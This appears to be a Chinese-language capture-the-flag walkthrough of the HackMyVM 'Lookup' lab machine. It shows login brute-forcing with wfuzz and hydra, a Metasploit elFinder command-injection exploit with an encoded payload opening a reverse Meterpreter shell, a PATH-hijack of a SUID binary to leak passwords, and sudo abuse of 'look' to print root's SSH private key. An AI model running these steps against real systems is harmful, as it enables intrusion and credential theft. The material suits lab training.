HackMyVm Lookup Walkthrough

靶机地址https://hackmyvm.eu/machines/machine.php?vm=Lookup

直接访问报错,需要在/etc/hosts里设置域名lookup.hmv,再次访问主页显示一个登录页面。

扫描目录没有发现什么敏感文件,也没有什么漏洞,sql注入也不行。只能尝试爆破,先尝试爆出用户名。这里要注意wfuzz的语法,特别是要用多个-H加入必要的头信息。

└─$ wfuzz -c -w /usr/share/wordlists/seclists/Usernames/Names/names.txt   -H 'Host: lookup.hmv' -H 'Origin: http://lookup.hmv' -H 'Referer: http://lookup.hmv' -d "username=FUZZ&password=123456"  --hh 74  http://lookup.hmv/login.php 
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://lookup.hmv/login.php
Total requests: 10177

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                     
=====================================================================

000000086:   200        0 L      8 W        62 Ch       "admin"                                                                                                                                     
000004897:   200        0 L      8 W        62 Ch       "jose"                                                                                                                                      

Total time: 0
Processed Requests: 10177
Filtered Requests: 10175
Requests/sec.: 0

得到两个用户名,再用这两个用户名尝试爆破密码。

└─$ wfuzz -c -w names.txt -w /usr/share/wordlists/seclists/Passwords/probable-v2-top12000.txt   -H 'Host: lookup.hmv' -H 'Origin: http://lookup.hmv' -H 'Referer: http://lookup.hmv' -d "username=FUZZ&passwo
rd=FUZ2Z"  --hh 62  http://lookup.hmv/login.php                                                                                                                                                              
********************************************************                                                                                                                                                     
* Wfuzz 3.1.0 - The Web Fuzzer                         *                                                                                                                                                     
********************************************************                                                                                                                                                     

Target: http://lookup.hmv/login.php                                                                                                                                                                          
Total requests: 25290                                                                                                                                                                                        

=====================================================================                                                                                                                                        
ID           Response   Lines    Word       Chars       Payload                                                                                                                                              
=====================================================================                                                                                                                                        

000000596:   200        0 L      10 W       74 Ch       "admin - password123"                                                                                                                                
000013241:   302        0 L      0 W        0 Ch        "jose - password123" 

有效用户名和密码是第二项。在登录页面输入后,跳转到files.lookup.hmv,再次把这个域名加入到/etc/hosts。打开网站发现是elfinder,一个在线文件管理器。

查看版本后,发现可能有漏洞。在msfconsole里查找。

msf6 > search elfinder                                                                                                                                                                                       

Matching Modules                                                                                                                                                                                             
================                                                                                                                                                                                             

   #  Name                                                               Disclosure Date  Rank       Check  Description                                                                                      
   -  ----                                                               ---------------  ----       -----  -----------                                                                                      
   0  exploit/multi/http/builderengine_upload_exec                       2016-09-18       excellent  Yes    BuilderEngine Arbitrary File Upload Vulnerability and execution                                  
   1  exploit/unix/webapp/tikiwiki_upload_exec                           2016-07-11       excellent  Yes    Tiki Wiki Unauthenticated File Upload Vulnerability                                              
   2  exploit/multi/http/wp_file_manager_rce                             2020-09-09       normal     Yes    WordPress File Manager Unauthenticated Remote Code Execution                                     
   3  exploit/linux/http/elfinder_archive_cmd_injection                  2021-06-13       excellent  Yes    elFinder Archive Command Injection                                                               
   4  exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection  2019-02-26       excellent  Yes    elFinder PHP Connector exiftran Command Injection 

使用最后一个漏洞,成功得到shell。

msf6 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set RHOSTS files.lookup.hmv                                                                                                        
RHOSTS => files.lookup.hmv                                                                                                                                                                                   
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set lhost 192.168.56.101                                                                                                           
lhost => 192.168.56.101                                                                                                                                                                                      
msf6 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run                                                                                                                                

[*] Started reverse TCP handler on 192.168.56.101:4444                                                                                                                                                       
[*] Uploading payload 'RaDNuJN.jpg;echo 6370202e2e2f66696c65732f5261444e754a4e2e6a70672a6563686f2a202e6155304230662e706870 |xxd -r -p |sh& #.jpg' (1967 bytes)
[*] Triggering vulnerability via image rotation ... 
[*] Executing payload (/elFinder/php/.aU0B0f.php) ...
[*] Sending stage (39927 bytes) to 192.168.56.130
[+] Deleted .aU0B0f.php
[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.130:49188) at 2024-09-24 08:56:59 +0800
...
meterpreter > shell
Process 1734 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/files.lookup.hmv/public_html/elFinder/php

下面看如何提权。查找敏感文件。

find / -perm -u=s 2>/dev/null                                                                                                                                                                                
/snap/snapd/19457/usr/lib/snapd/snap-confine                                                                                                                                                                 
/snap/core20/1950/usr/bin/chfn                                                                                                                                                                               
/snap/core20/1950/usr/bin/chsh              
...
/usr/sbin/pwm
/usr/bin/at
/usr/bin/fusermount
/usr/bin/gpasswd
/usr/bin/chfn
...

比较可疑的就是/usr/sbin/pwm。尝试运行一下。

/usr/sbin/pwm
[!] Running 'id' command to extract the username and user ID (UID)
[!] ID: www-data
[-] File /home/www-data/.passwords not found

可以将pwm下载到本机进行反编译

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4; // [rsp+Fh] [rbp-131h]
  FILE *stream; // [rsp+10h] [rbp-130h]
  FILE *v6; // [rsp+18h] [rbp-128h]
  char v7[64]; // [rsp+20h] [rbp-120h] BYREF
  char s[112]; // [rsp+60h] [rbp-E0h] BYREF
  char filename[104]; // [rsp+D0h] [rbp-70h] BYREF
  unsigned __int64 v10; // [rsp+138h] [rbp-8h]

  v10 = __readfsqword(0x28u);
  puts("[!] Running 'id' command to extract the username and user ID (UID)");
  snprintf(s, 0x64uLL, "id");
  stream = popen(s, "r");
  if ( stream )
  {
    if ( (unsigned int)__isoc99_fscanf(stream, "uid=%*u(%[^)])", v7) == 1 )
    {
      printf("[!] ID: %s\n", v7);
      pclose(stream);
      snprintf(filename, 0x64uLL, "/home/%s/.passwords", v7);
      v6 = fopen(filename, "r");
      if ( v6 )
      {
        while ( 1 )
        {
          v4 = fgetc(v6);
          if ( v4 == -1 )
            break;
          putchar(v4);
        }
        fclose(v6);
        return 0;
      }
      else
      {
        printf("[-] File /home/%s/.passwords not found\n", v7);
        return 0;
      }
    }
    else
    {
      perror("[-] Error reading username from id command\n");
      return 1;
    }
  }
  else
  {
    perror("[-] Error executing id command\n");
    return 1;
  }
}

这个代码的核心是,运行系统的id命令,里面要包含“uid=id(name)”这样的标准信息,匹配name字符串,然后显示/home/name目录下的文件。这里的核心就是构建一个伪造的id命令,模仿系统id的回显。

PATH=/tmp:$PATH
echo "echo 'uid=1234(think)'" > id
chmod +x id
/usr/sbin/pwm                                                                                                                                                                                                
[!] Running 'id' command to extract the username and user ID (UID)                                                                                                                                           
[!] ID: think
jose1006                                                                                                                                                                                                     
jose1004                                                                                                                                                                                                     
jose1002
...

列出的字符串中应该有think密码,这里爆破一下即可。

└─$ hydra -l think -P pass.txt ssh://192.168.56.130 -t 20
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-24 09:29:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 20 tasks per 1 server, overall 20 tasks, 49 login tries (l:1/p:49), ~3 tries per task
[DATA] attacking ssh://192.168.56.130:22/
[22][ssh] host: 192.168.56.130   login: think   password: josemario.AKA(think)

最后就是得到root权限。

think@lookup:~$ sudo -l
[sudo] password for think: 
Matching Defaults entries for think on lookup:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User think may run the following commands on lookup:
    (ALL) /usr/bin/look

think@lookup:~$ LFILE=/root/.ssh/id_rsa
think@lookup:~$ sudo look '' "$LFILE"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAptm2+DipVfUMY+7g9Lcmf/h23TCH7qKRg4Penlti9RKW2XLSB5wR
Qcqy1zRFDKtRQGhfTq+YfVfboJBPCfKHdpQqM/zDb//ZlnlwCwKQ5XyTQU/vHfROfU0pnR
j7eIpw50J7PGPNG7RAgbP5tJ2NcsFYAifmxMrJPVR/+ybAIVbB+ya/D5r9DYPmatUTLlHD
...

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注